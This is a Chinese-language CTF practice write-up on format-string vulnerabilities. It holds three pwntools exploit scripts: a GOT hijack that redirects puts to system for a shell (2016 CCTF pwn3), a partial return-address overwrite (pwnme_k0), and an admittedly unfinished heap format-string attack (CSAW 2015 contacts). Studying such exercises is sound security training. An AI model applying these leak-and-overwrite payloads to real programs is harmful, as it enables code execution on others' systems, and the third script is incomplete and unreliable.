ctfwiki format string 练习

hijack GOT

本题是2016 CCTF 中的pwn3

#coding=utf-8
from pwn import *
context(arch='i386',os='linux',log_level='debug')

# Target binary plus a local instance of it.  ELF() is used for GOT lookups;
# the GOT address is later embedded verbatim in a format string, which only
# works if the binary is not PIE — TODO confirm with checksec.
myelf = ELF('./pwn3')
myproc = process(myelf.path)

def get_1(name):
    """Issue the ``get`` command for *name* and return the service's reply.

    The reply is whatever a single ``recv()`` returns after the name is
    sent; when the stored content is a format string this is printf's
    output, i.e. the leaked data.  Note that ``recv()`` may also swallow
    the following ``ftp>`` prompt, so callers must not wait for it again.
    """
    myproc.sendlineafter('ftp>', 'get')
    myproc.sendlineafter('get:', name)
    return myproc.recv()

def put_2(name, content):
    """Issue the ``put`` command, storing *content* under *name*.

    *content* is echoed back verbatim by the service when the entry is
    printed, which is what turns it into a format string later on.
    """
    for prompt, answer in (('ftp>', 'put'),
                           ('upload:', name),
                           ('the content:', content)):
        myproc.sendlineafter(prompt, answer)

def dir_3():
    """Issue the ``dir`` command once the ``ftp>`` prompt has been seen."""
    myproc.sendlineafter('ftp>', 'dir')

# Login: the banner ends in "Rainism):" and this fixed credential is what
# the author used — TODO confirm it is the string the binary checks.
myproc.recvuntil('Rainism):')
myproc.sendline('rxraclhm')

# --- Step 1: arbitrary read via the format string -------------------------
# The stored content reaches printf() as the format string and the buffer
# itself is positional argument 7 (see '%7$x' here and fmtstr_payload(7, ..)
# below).  '%8$s' is exactly 4 bytes, so the packed GOT address that follows
# it occupies argument slot 8; '%8$s' dereferences that pointer and prints
# the GOT entry, i.e. the resolved libc address of puts().  The trailing
# '%7$x' echoes the first word of the format string itself — presumably a
# cheap check that the offset guess (7) is right.
# Overwriting the GOT later requires the binary not to be Full RELRO —
# verify with checksec before relying on this.
puts_got = myelf.got['puts']
log.warn('#####puts_got addr: 0x%x#####' % puts_got)
input1 = '%8$s' + p32(puts_got) + '%7$x'
put_2('aaaa',input1)
###
###gdb.attach(myproc,"b printf")
###
# 'get' prints the entry through printf; the first 4 bytes of the output are
# the leaked pointer.  NOTE: '%s' stops at the first NUL, so a libc address
# containing a 0x00 byte yields fewer than 4 bytes and u32() raises — rerun
# in that case.
puts_addr = u32(get_1('aaaa')[:4])

log.warn('#####puts addr: 0x%x#####' % puts_addr)

# Symbol offsets for the exact libc build the challenge ships with.  Against
# any other libc take them from ELF('libc.so.6').symbols['puts'] /
# ['system'] instead of hard-coding.
puts_libc_offset = 0x5f150
sys_libc_offset = 0x3a950

libc_base = puts_addr - puts_libc_offset
sys_addr = libc_base + sys_libc_offset

log.warn('#####libc_base addr: 0x%x#####' % libc_base)
log.warn('#####sys_addr addr: 0x%x#####' % sys_addr)
# --- Step 2: arbitrary write ('%n' family) into puts@GOT -------------------
# fmtstr_payload emits the '%c'/'%hhn' sequence that writes sys_addr over the
# GOT slot of puts, assuming the format string is positional argument 7.
##
payload = fmtstr_payload(7, {puts_got: sys_addr})

# Done inline rather than via put_2(): presumably because get_1() drained
# the socket with a bare recv(), which may already have consumed the next
# 'ftp>' prompt, so waiting for it again could hang.
myproc.sendline('put')
myproc.recvuntil('upload:')
myproc.sendline("/bin/sh;")
myproc.recvuntil('the content:')
myproc.sendline(payload)

# Printing this entry executes the write payload: puts@GOT now -> system().
get_1('/bin/sh;')

# 'dir' lists stored names, presumably through puts(); with the GOT hijacked
# that becomes system("/bin/sh;") — the ';' terminates the command cleanly.
myproc.sendline('dir')

myproc.interactive()

hijack retaddr

本题是三个白帽的pwnme_k0

#coding=utf-8
from pwn import *
context(arch='amd64',os="linux",log_level="debug")

# Non-PIE x86-64 target (the breakpoint address 0x400b39 below lies in the
# fixed 0x400000 load range); process() runs it locally.
myelf = ELF("./pwnme_k0")
myproc = process(myelf.path)

# The password is later echoed through printf() as the format string (menu
# item 1), so '%6$p' prints positional argument 6 — a stack address here
# (presumably a saved stack slot; the -0x38 distance to the return-address
# slot below is binary-specific, confirm under gdb).
myproc.recvuntil("Input your username(max lenth:20): ")
myproc.sendline("name")
myproc.recvuntil("Input your password(max lenth:20): ")
passwd = '%6$p'
myproc.sendline(passwd)

##
##gdb.attach(myproc,"b *0x400b39")
##
# Menu 1 shows the stored info and triggers the leak; parse the hex after
# the '0x' prefix.
myproc.recvuntil('>')
myproc.sendline(str(1))
myproc.recvuntil("0x")

data = myproc.recvline().strip()
stack_addr = int(data,16)
# Address of the saved return address we want to overwrite, at a fixed
# distance from the leaked stack pointer.
ret_stack = stack_addr - 0x38

## Overwrite the return address on the stack with a privilege-escalation
## gadget (menu 2 re-enters username and password).  The new username holds
## the raw 8-byte target pointer, and with the format string at argument 8
## '%8$hn' reads it as the write target.  '%2218c' pads the output to
## 2218 == 0x8aa characters and '%hn' stores that count as a 16-bit value,
## so only the low two bytes of the return address change.  A 2-byte partial
## overwrite is what keeps this practical: padding to a full 0x400xxx count
## would mean printing millions of characters.  The implied gadget is at
## 0x....08aa inside the binary's fixed mapping — TODO confirm against the
## disassembly.
myproc.recvuntil('>')
myproc.sendline(str(2))
myproc.recvuntil("please input new username(max lenth:20): ")
myproc.sendline(p64(ret_stack))
myproc.recvuntil("please input new password(max lenth:20): ")
myproc.sendline("%2218c%8$hn")

## Menu 1 prints the (now format-string) password, performing the write;
## the printing function presumably then returns into the gadget.
myproc.recvuntil('>')
myproc.sendline(str(1))

myproc.interactive()

堆上的格式化字符串漏洞

本题是2015年CSAW中的 contacts

(这个题还没调完,后来有别的事去了,先放一下)

#coding=utf-8
from pwn import *

context(arch='i386',os='linux',log_level='debug')

# 32-bit target (the gdb breakpoint 0x08048c22 used below is a fixed,
# non-PIE address); process() runs it locally.
myelf = ELF('./contacts')
myproc = process(myelf.path)

def Create(c_name, c_phone, c_len, c_desp):
    """Add a contact via menu item 1.

    *c_len* is sent as-is (callers pass ``str(n)``) and sizes the
    description buffer; *c_desp* is the description, which is later
    printed back through printf() and is therefore the format-string
    carrier in this exploit.
    """
    myproc.sendlineafter('>>> ', str(1))
    myproc.recvuntil("Contact info: ")
    for prompt, answer in (("\tName: ", c_name),
                           ("\tEnter Phone No: ", c_phone),
                           ("\tLength of description: ", c_len),
                           ("\tEnter description:\n\t\t", c_desp)):
        myproc.sendlineafter(prompt, answer)

def Display():
    """Select menu item 4 (list contacts) and stop just before the first
    contact's description, so the caller can read printf's output."""
    myproc.sendlineafter('>>> ', str(4))
    myproc.recvuntil("\tDescription: ")

# --- Leak: the description is printed through printf() as the format
# string, so '%31$p' dumps positional argument 31.  Subtracting 247 treats
# that value as main's return address into __libc_start_main
# (__libc_start_main+247 for the challenge libc) — offset specific to that
# build, verify under gdb.
Create('aaaaaaaa','1234567891',str(50),'%31$paaaa')

Display()
data = myproc.recvuntil('aaaa',drop=True)
libc_start_main = int(data,16) - 247
log.warn("a: 0x%x" % libc_start_main)
# Hard-coded offsets for the challenge libc; for another build read them from
# ELF('libc.so.6').symbols[...] / .search('/bin/sh') instead.
libc_base = libc_start_main - 0x18550
log.warn("b: 0x%x" % libc_base)
sys_addr = libc_base + 0x3a950
binsh_addr = libc_base + 0x15910b


# Second contact: its heap-resident description starts with a fake frame
# [system, dummy return, "/bin/sh" pointer] and ends with a format string
# leaking two more values — argument 6 (a stack address, used below as the
# write target) and argument 11 (a heap address, taken to be this very
# description).
payload = flat([sys_addr,'aaaa',binsh_addr,'%6$p%11$pbbbb'])
# Debug artifact left enabled: spawns gdb and waits for it.  Comment out for
# a non-interactive run.
gdb.attach(myproc,"b *0x08048c22")
Create('xxxxxxxx','2342342234',str(50),payload)
Display()
# Display() already consumed the first contact's "Description: " header;
# skip to the second contact's description, which holds this leak.
myproc.recvuntil("\tDescription: ")
data = myproc.recvuntil('bbbb',drop=True)
data = data.split('0x')
print data
ebp_addr = int(data[1],16)
heap_addr = int(data[2],16)

# Earlier manual attempt at a single '%n' write (kept for reference;
# superseded by fmtstr_payload below).
#payoad = '%'+str(ebp_addr-4)+'x'+'%6$n'
#part1 = (ebp_addr-4)/2
#part2 = ebp_addr-4 -part1
#payload = '%'+str(part1)+'x%'+str(part2)+'x%6$n'

# --- Write: store heap_addr into the stack slot at ebp_addr.  Intended
# effect (author's plan; the write-up says this step is not working yet): if
# ebp_addr is a saved-ebp slot, a later `leave; ret` pivots esp onto the heap
# frame above and returns into system("/bin/sh").
# NOTE(review): fmtstr_payload embeds its target pointers in the format
# string and assumes they are readable as positional argument 6 onward.
# This format string lives on the heap (see the section title and diagram),
# so that assumption needs a stack pointer leading to the buffer — check it
# before debugging further.
payload = fmtstr_payload(6,{ebp_addr:heap_addr})
print payload

# 400-byte description gives the multi-part write payload enough room.
Create('eeeeeeee','1231231231',str(400),payload)
Display()

myproc.interactive()
+------------+
| tag 0/1 |
+------------+v2+76
|len of desp |
+------------+v2+72
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| Name |
+------------+ v2+8 +---------+
| &heap1 | +--------+ | |
+------------+ v2+4 | Phone | | desp |
| &heap2 | | | | |
+------------+ v2 +--------+ +---------+
0x804b0a0 heap1 heap2

0x804b088 record num

参考wp:

http://geeksspeak.github.io/blog/2015/09/21/csaw-2015-pwn250-contacts/

https://blog.osiris.cyber.nyu.edu/2015/09/28/csaw-ctf-contacts/

https://github.com/osirislab/CTF-Solutions/blob/master/CSAWCTF_2015/2015-10-03-csaw-ctf-contacts.markdown